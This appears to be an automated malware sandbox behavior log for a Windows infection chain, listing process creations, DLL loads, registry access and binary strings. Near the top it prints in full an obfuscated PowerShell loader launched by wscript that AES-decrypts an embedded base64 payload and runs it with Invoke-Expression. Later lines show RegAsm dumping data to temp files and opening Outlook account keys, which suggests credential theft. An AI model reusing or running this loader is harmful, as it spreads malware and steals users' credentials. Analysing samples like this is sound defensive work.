                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
